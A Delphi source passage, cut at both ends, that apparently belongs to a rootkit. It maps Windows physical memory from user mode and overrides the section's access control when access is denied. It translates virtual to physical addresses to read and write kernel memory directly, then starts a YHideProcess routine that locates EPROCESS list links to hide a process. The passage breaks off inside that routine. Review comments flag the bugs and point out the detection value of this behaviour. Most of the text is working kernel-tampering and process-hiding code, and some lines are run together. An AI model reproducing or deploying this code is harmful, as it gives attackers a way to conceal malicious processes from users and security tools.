Result := True; end; //---------------------------------------------------------------------------
procedure CloseNTDLL;
// Drops the module handle held in g_hNtDLL: frees it when one is held, then
// clears the global so a later call is a no-op.
begin
  if g_hNtDLL <> 0 then
    FreeLibrary(g_hNtDLL);
  g_hNtDLL := 0;
end;
//---------------------------------------------------------------------------
status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes);
if (status = STATUS_ACCESS_DENIED) then begin ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM);
status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE, @attributes); end;
if not (LongInt(status) >= 0) then begin Result := 0; Exit; end;
g_pMapPhysicalMemory := MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);
if (g_pMapPhysicalMemory = nil) then begin Result := 0; Exit; end;
Result := g_hMPM; end;
//---------------------------------------------------------------------------
// Translates a virtual address to a physical address by walking the
// two-level x86 page tables through the physical-memory section g_hMPM.
//   BaseAddress: mapped view of the page directory (presumably the view
//                created at PhyDirectory above — confirm against caller).
//   addr:        virtual address to translate.
//   Returns the physical address, or nil when the directory entry or the
//   page-table entry is not present (bit 0 clear).
// NOTE(review): the 10/10/12 bit split hard-codes the non-PAE 32-bit layout;
// it is not valid on PAE or 64-bit kernels. User-mode mapping of the
// physical-memory section to read page tables is itself a strong signal for
// kernel-tamper detection.
function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
  VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
  VAddr := DWORD(addr);
  // PGDE := BaseAddress[VAddr shr 22];
  // Top 10 bits of the address index the page directory (explicit pointer
  // arithmetic replaces the commented-out array form).
  PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^; // Modify by dot.
  // Bit 0 of the entry is the present bit.
  if 0 = (PGDE and 1) then begin Result := nil; Exit; end;
  // Bit 7 of the directory entry: when set the entry maps one 4 MB page.
  tmp := PGDE and $00000080;
  if (0 <> tmp) then begin
    // 4 MB page: top 10 bits of the entry plus the low 22 bits of the address.
    PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
  end else begin
    // Map the 4 KB page table the entry points to. The literal 4 is the value
    // of FILE_MAP_READ. NOTE(review): a nil return is not checked here and is
    // dereferenced by the next statement.
    PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
    // PTE := (PDWORD(PGDE))[(VAddr and $003FF000) shr 12];
    // Middle 10 bits of the address index the page table.
    PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^; // Modify by dot.
    // NOTE(review): this early exit leaks the view mapped above (no UnmapViewOfFile).
    if (0 = (PTE and 1)) then begin Result := nil; Exit; end;
    // Frame number from the entry plus the low 12-bit page offset.
    PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
    UnmapViewOfFile(Pointer(PGDE));
  end;
  Result := Pointer(PAddr);
end;
//---------------------------------------------------------------------------
// Reads one DWORD at virtual address addr: translates it with LinearToPhys,
// maps the containing 4 KB physical page from g_hMPM, reads, unmaps.
//   Returns the value read, or 0 when the page could not be mapped.
// NOTE(review): a nil result from LinearToPhys is not checked; phys becomes
// 0 and physical page 0 is read instead of reporting failure, so callers
// cannot tell "value is 0" from "translation failed".
function GetData(addr: Pointer): DWORD;
var
  phys, ret: DWORD;
  tmp: PDWORD;
begin
  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  // Map the page-aligned frame; requests write access although only a read follows.
  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));
  if (nil = tmp) then begin Result := 0; Exit; end;
  // ret := tmp[(phys and $FFF) shr 2];
  // Index the DWORD at the in-page offset (low 12 bits, in DWORD units).
  ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^; // Modify by dot.
  UnmapViewOfFile(tmp);
  Result := ret;
end;
//---------------------------------------------------------------------------
// Writes one DWORD at virtual address addr: translates it with LinearToPhys,
// maps the containing 4 KB physical page from g_hMPM for writing, stores
// data, unmaps.
//   Returns True after the store, False when the page could not be mapped.
// NOTE(review): as in GetData, a nil from LinearToPhys is not checked and
// would write into physical page 0. Writes to kernel memory through the
// physical-memory section bypass every kernel-side integrity check; this is
// the behaviour a host-based detector should alert on.
function SetData(addr: Pointer; data: DWORD): Boolean;
var
  phys: DWORD;
  tmp: PDWORD;
begin
  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000, $1000));
  if (nil = tmp) then begin Result := false; Exit; end;
  // tmp[(phys and $FFF) shr 2] := data;
  // Store at the in-page offset (low 12 bits, in DWORD units).
  PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data; // Modify by dot.
  UnmapViewOfFile(tmp);
  Result := TRUE;
end;
//---------------------------------------------------------------------------
{long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp) begin ExitProcess(0); return 1 ; end }
//---------------------------------------------------------------------------
function YHideProcess: Boolean; var thread, process: DWORD; fw, bw: DWORD; begin // SetUnhandledExceptionFilter(exeception); if (FALSE = InitNTDLL) then begin Result := FALSE; Exit; end;
if (0 = OpenPhysicalMemory) then begin Result := FALSE; Exit; end;
thread := GetData(Pointer($FFDFF124)); //kteb process := GetData(Pointer(thread + $44)); //kpeb
if (0 = g_osvi.dwMinorVersion) then begin fw := GetData(Pointer(process + $A0)); bw := GetData(Pointer(process + $A4));